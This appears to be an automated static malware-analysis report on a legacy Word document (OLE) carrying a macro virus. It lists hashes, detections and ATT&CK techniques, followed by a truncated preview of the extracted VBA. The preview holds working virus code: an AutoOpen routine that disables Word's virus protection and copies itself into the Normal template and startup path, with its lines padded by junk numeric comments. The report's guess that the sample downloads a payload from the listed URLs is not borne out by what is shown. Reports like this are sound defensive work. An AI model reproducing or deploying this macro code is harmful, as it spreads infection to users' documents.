Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 571972ff8dafae5a…

MALICIOUS

Office (OLE)

51.0 KB Created: 1998-11-04 07:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e60c7e1252a2e4a7e7dbe3ae49e42648 SHA-1: ea96565328759d55120ea3d3b5f4c2c954fbd870 SHA-256: 571972ff8dafae5aa499b3c8bfbe0e5e08f1b67935e9701a39d96431ceb428dc
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro virus markers and AutoOpen/Auto_Close VBA macros, indicating malicious intent. ClamAV detections further confirm its malicious nature. The VBA script, though truncated, attempts to disable virus protection and execute further actions, likely downloading a payload from one of the embedded URLs.

Heuristics 6

  • ClamAV: Doc.Trojan.Class-36 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-36
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.microsoft.com� In document text (OLE body)
    • http://www.pussy.com�In document text (OLE body)
    • http://www.hardcore.comIn document text (OLE body)
    • http://www.xxx.com�In document text (OLE body)
    • http://www.babe.comIn document text (OLE body)
    • http://www.pussy.comIn document text (OLE body)
    • http://www.microsoft.comIn document text (OLE body)
    • http://www.xxx.comIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39723 bytes
SHA-256: 822c8e1249d4d21df31de74affa6e42e9a13ddbd2b1f5ff7f2f6e179e95e957f
Detection
ClamAV: Doc.Trojan.Class-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'243984400311939179247.61082934833639E+182439844003119391792424398440031193917924
Randomize
'87939381764325166756003.80352490531545E+2187939381764325166756008793938176432516675600
On Error GoTo 97
'828495628962393440359841.98295487630389E+228284956289623934403598482849562896239344035984
I = 0: o = 0: r = 0
'11680673292881692705963.36601110204948E+2011680673292881692705961168067329288169270596
Options.VirusProtection = False
'722168878242479113806491.79033883666218E+227221688782424791138064972216887824247911380649
Options.SaveNormalPrompt = False
'68626709089704153988814.83237709439228E+2168626709089704153988816862670908970415398881
Options.ConfirmConversions = False
'197686412011678737561763.3186360529075E+211976864120116787375617619768641201167873756176
    If Day(13) And Month(10) Then Call ©
'30928849956544750932011.68485198395284E+2130928849956544750932013092884995654475093201
    If Day(13) And Month(11) Then Call ê
'236292235244766148791291.12620395138034E+222362922352447661487912923629223524476614879129
    If Day(13) And Month(12) Then Call Ï
'81759572412322271211.89867901149653E+1881759572412322271218175957241232227121
lx = Int(Rnd(1) * 100) + 1
'835805446095629695979694.70533055965588E+228358054460956296959796983580544609562969597969
    If lx = 99 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'6148416164763084028012.92854228092546E+20614841616476308402801614841616476308402801
    lr = Int(Rnd(1) * 75) + 1
'90761805289342083520253.10481178575062E+2190761805289342083520259076180528934208352025
    If lr = 74 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76)
'7659050256822559608096.30002537691697E+20765905025682255960809765905025682255960809
    ls = Int(Rnd(1) * 50) + 1
'19866620601446582556258.87208621204349E+2019866620601446582556251986662060144658255625
    If ls = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(65) + Chr(80) + Chr(80) + Chr(89) + Chr(32) + Chr(73) + Chr(83) + Chr(32) + Chr(79) + Chr(76) + Chr(68)
'6362501761817171960891.15617597993853E+20636250176181717196089636250176181717196089
    lt = Int(Rnd(1) * 25) + 1
'224577198813433936560047.71183853545031E+212245771988134339365600422457719881343393656004
    If lt = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(65) + Chr(80) + Chr(80) + Chr(89) + Chr(32) + Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76), vbCritical
'40207012813454312547561.38887588849489E+2140207012813454312547564020701281345431254756
gx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'133312425214209777735845.61215679559893E+211333124252142097777358413331242521420977773584
xg = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'919114425611841396832251.69245439179353E+229191144256118413968322591911442561184139683225
If xg > 174 And gx > 0 Then GoTo 97
'509346219693171221544961.61524970572486E+225093462196931712215449650934621969317122154496
If xg < 174 Then
'376325080815368390322492.02025992193067E+223763250808153683903224937632508081536839032249
 Set sx = NormalTemplate.VBProject.VBComponents.Item(1)
'760220698411558496692841.1848014443005E+227602206984115584966928476022069841155849669284
 ActiveDocument.VBProject.VBComponents.Item(1).Name = sx.Name
'442803640413815298177611.68942792229535E+224428036404138152981776144280364041381529817761
 ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76)
'27797225625301168257648.37164200
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.